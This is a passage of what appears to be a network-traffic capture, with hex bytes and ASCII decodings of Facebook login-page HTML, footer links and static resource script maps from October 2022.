                                                                                                                                  Data Ascii: Portugal)">Portugus (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLo
                                                                                                                                  2022-10-17 20:07:22 UTC1509INData Raw: 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 72 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e
                                                                                                                                  Data Ascii: quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">Trke</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" on
                                                                                                                                  2022-10-17 20:07:22 UTC1510INData Raw: 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 39 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 20 28 43 68 69 6e 61 29 22 3e e4 b8 ad e6 96 87 28 e7 ae 80 e4 bd 93 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 31 37 69 20 5f 35 31 37 68 20 5f 35 31 73 79 22 20 72 65 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61 78
                                                                                                                                  Data Ascii: s\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)">()</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajax
                                                                                                                                  2022-10-17 20:07:22 UTC1512INData Raw: 3a 2f 2f 77 77 77 2e 6f 63 75 6c 75 73 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 4f 63 75 6c 75 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4f 63 75 6c 75 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 50 6f 72 74 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 6f 72 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 25 33 41 25 32 46 25 32
                                                                                                                                  Data Ascii: ://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2
                                                                                                                                  2022-10-17 20:07:22 UTC1513INData Raw: 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 43 72 65 61 74 65 20 61 20 70 61 67 65 22 3e 43 72 65 61 74 65 20 50 61 67 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 44 65 76 65 6c 6f 70 20 6f 6e 20 6f 75 72 20 70 6c 61 74 66 6f 72 6d 2e 22 3e 44 65 76 65 6c 6f 70 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c 2f
                                                                                                                                  Data Ascii: footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</
                                                                                                                                  2022-10-17 20:07:22 UTC1515INData Raw: 66 22 20 77 69 64 74 68 3d 22 30 22 20 68 65 69 67 68 74 3d 22 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 2f 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 62 78 44 61 74 61 22 3a 7b 22 38 37 35 32 33 31 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70 44
                                                                                                                                  Data Ascii: f" width="0" height="0" style="display:none" /></span></div><div style="display:none"></div><script>requireLazy(["HasteSupportData"],function(m){m.handle({"bxData":{"875231":{"uri":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clpD
                                                                                                                                  2022-10-17 20:07:22 UTC1516INData Raw: 22 31 38 34 30 38 30 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6e 59 63 74 6f 54 73 72 37 61 6c 52 69 51 57 6f 22 7d 2c 22 31 38 34 38 37 34 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 47 73 48 39 4b 62 2d 33 57 2d 74 61 5a 61 65 49 22 7d 2c 22 31 39 30 36 38 37 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 64 49 42 69 56 76 39 62 55 44 58 6c 6d 33 4d 55 22 7d 2c 22 31 39 38 35 39 34 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 4f 6f 35 6c 59 5f 5f 35 77 55 54 70 4c 42 41 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54
                                                                                                                                  Data Ascii: "1840809":{"result":false,"hash":"AT5nYctoTsr7alRiQWo"},"1848749":{"result":false,"hash":"AT5GsH9Kb-3W-taZaeI"},"1906871":{"result":false,"hash":"AT6dIBiVv9bUDXlm3MU"},"1985945":{"result":true,"hash":"AT66Oo5lY__5wUTpLBA"},"5541":{"result":true,"hash":"AT
                                                                                                                                  2022-10-17 20:07:22 UTC1517INData Raw: 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 4b 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 37 58 46 72 73 4d 5a 61 6d 76 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 76 47 74 32 6d 78 7a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 6c 5f 64 45 45 6c 4a 69 42 43 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 30 72 48 69 64 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f
                                                                                                                                  Data Ascii: ttps:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yK\/l\/en_US\/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz"},"vGt2mxz":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/r\/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz"},"R0rHidL":{"type":"js","src":"https:\/\/
                                                                                                                                  2022-10-17 20:07:22 UTC1519INData Raw: 63 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 6e 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 55 39 69 37 53 4d 63 77 48 36 73 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6f 5c 2f 75 6e 79 72 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 65 47 61 68 6c 57 63 78 56 6c 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 65 4d 6b 4d 78 48 5a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76
                                                                                                                                  Data Ascii: c.php\/v3iLl54\/yn\/l\/en_US\/U9i7SMcwH6s.js?_nc_x=Ij3Wp8lg5Kz"},"o\/unyrn":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/eGahlWcxVln.js?_nc_x=Ij3Wp8lg5Kz"},"eMkMxHZ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v
                                                                                                                                  2022-10-17 20:07:22 UTC1520INData Raw: 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 71 31 6a 53 5a 38 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 72 5c 2f 46 31 6e 57 6d 57 61 42 4f 65 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6a 51 37 6e 5c 2f 39 6a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 79 4e 59 63 63 35 65 43 6a 75 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22
                                                                                                                                  Data Ascii: nc_x=Ij3Wp8lg5Kz"},"q1jSZ8c":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/r\/F1nWmWaBOeO.js?_nc_x=Ij3Wp8lg5Kz"},"jQ7n\/9j":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/yNYcc5eCjuy.js?_nc_x=Ij3Wp8lg5Kz"},"
                                                                                                                                  2022-10-17 20:07:22 UTC1522INData Raw: 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 33 5c 2f 72 5c 2f 74 6a 51 34 46 48 5a 4e 42 5a 49 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 79 68 6d 4d 4b 66 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 76 43 36 34 5c 2f 79 71 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 34 5a 6a 6d 33 64 75 5a 47 72 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e
                                                                                                                                  Data Ascii: fbcdn.net\/rsrc.php\/v3\/y3\/r\/tjQ4FHZNBZI.js?_nc_x=Ij3Wp8lg5Kz"},"yhmMKfP":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ivC64\/yq\/l\/en_US\/4Zjm3duZGrQ.js?_nc_x=Ij3Wp8lg5Kz"},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.n
                                                                                                                                  2022-10-17 20:07:22 UTC1523INData Raw: 79 51 5c 2f 72 5c 2f 77 34 48 5f 31 59 71 67 70 4c 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 32 47 70 61 6b 5c 2f 31 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 58 75 34 5c 2f 79 31 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 58 4e 36 4d 39 6b 79 61 4b 52 58 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 46 75 50 62 57 68 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 61 5c 2f 72 5c 2f 72
                                                                                                                                  Data Ascii: yQ\/r\/w4H_1YqgpLv.js?_nc_x=Ij3Wp8lg5Kz"},"2Gpak\/1":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ieXu4\/y1\/l\/en_US\/XN6M9kyaKRX.js?_nc_x=Ij3Wp8lg5Kz"},"iFuPbWh":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ya\/r\/r
                                                                                                                                  2022-10-17 20:07:22 UTC1525INData Raw: 55 53 5c 2f 49 30 68 4c 78 4b 73 63 6d 71 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 63 59 55 33 63 33 32 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 6a 51 46 6c 74 34 67 79 70 39 52 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 33 4f 67 53 4a 45 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5f 5c 2f 72 5c 2f 6a 69 58 4c 74 37 7a 61 4d 49 70 2e 6a 73 3f 5f 6e
                                                                                                                                  Data Ascii: US\/I0hLxKscmqy.js?_nc_x=Ij3Wp8lg5Kz"},"cYU3c32":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz"},"3OgSJE4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y_\/r\/jiXLt7zaMIp.js?_n
                                                                                                                                  2022-10-17 20:07:22 UTC1526INData Raw: 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 62 30 79 30 58 59 77 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 72 51 4c 34 5c 2f 79 59 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 47 79 74 6b 52 5a 46 4c 42 77 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 47 72 78 57 58 32 65 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 50 76 56 7a 58 39 45 41 4b 46 61 2e 63 73 73 3f 5f 6e 63 5f
                                                                                                                                  Data Ascii: Ij3Wp8lg5Kz"},"b0y0XYw":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3irQL4\/yY\/l\/en_US\/GytkRZFLBwM.js?_nc_x=Ij3Wp8lg5Kz"},"GrxWX2e":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/l\/0,cross\/PvVzX9EAKFa.css?_nc_
                                                                                                                                  2022-10-17 20:07:22 UTC1528INData Raw: 72 78 75 74 56 6a 51 7a 4f 57 2d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6e 7a 41 4b 76 4c 79 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 37 5c 2f 72 5c 2f 36 57 50 4a 79 70 35 48 61 30 6a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 57 46 4d 47 53 39 65 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 5f 6a 41 34 5c 2f 79 7a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 61 73 43 69 42 53 75 68
                                                                                                                                  Data Ascii: rxutVjQzOW-.css?_nc_x=Ij3Wp8lg5Kz"},"nzAKvLy":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/r\/6WPJyp5Ha0j.js?_nc_x=Ij3Wp8lg5Kz"},"WFMGS9e":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i_jA4\/yz\/l\/en_US\/asCiBSuh
                                                                                                                                  2022-10-17 20:07:22 UTC1529INData Raw: 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 4f 5f 53 6a 64 63 52 2d 78 4b 4c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 30 5c 2f 72 5c 2f 66 4e 33 63 43 6a 37 49 6c 34 44 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a
                                                                                                                                  Data Ascii: .js?_nc_x=Ij3Wp8lg5Kz"},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/O_SjdcR-xKL.js?_nc_x=Ij3Wp8lg5Kz"},"x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y0\/r\/fN3cCj7Il4D.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                  2022-10-17 20:07:22 UTC1531INData Raw: 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 53 75 62 6d 69 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 72 68 32 4a 47 30 55 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 2b 52 47 74 4d 30 6f 22 2c 22 6a
                                                                                                                                  Data Ascii: "],"be":1},"Form":{"r":["vcBcJjw","Z2GjVu9","vGt2mxz","hyKmpuu"],"be":1},"FormSubmit":{"r":["vcBcJjw","EF1hWl5","Z2GjVu9","n6W4xMH","vGt2mxz","rh2JG0U","hyKmpuu"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED"],"r":["+RGtM0o","j
                                                                                                                                  2022-10-17 20:07:22 UTC1531INData Raw: 31 65 32 62 0d 0a 32 5c 2f 6d 61 51 5c 2f 51 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5c 2f 6f 35 59 76 4f 32 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 6f 67 67 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 6f 6f 6c 74 69 70 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 63 68 58 77 50 72 55 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 33 4d 48 37 43 63 55 22 2c 22 50 30 67
                                                                                                                                  Data Ascii: 1e2b2\/maQ\/Q","e9ANzw\/","n6W4xMH","vGt2mxz","\/o5YvO2","hyKmpuu"],"be":1},"Toggler":{"r":["vcBcJjw","+RGtM0o","PMEs\/oy","KAjbrl\/","hyKmpuu","lWOvGTa","n6W4xMH","vGt2mxz"],"be":1},"Tooltip":{"r":["vcBcJjw","chXwPrU","R5w1rCJ","EF1hWl5","3MH7CcU","P0g
                                                                                                                                  2022-10-17 20:07:22 UTC1532INData Raw: 22 2c 22 64 5a 76 4c 69 6b 68 22 2c 22 6e 4d 46 57 7a 4c 58 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 48 4e 4a 6c 7a 30 66 22 2c 22 63 59 55 33 63 33 32 22 2c 22 33 4f 67 53 4a 45 34 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 6f 77 65 73 41 33 50 22 2c 22 55 66 71 36 59 57 58 22 2c 22 41 70 47 35 56 4b 34 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 47 61 74 69 6e 67 22 2c 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 54 61 67 67 65 72 22
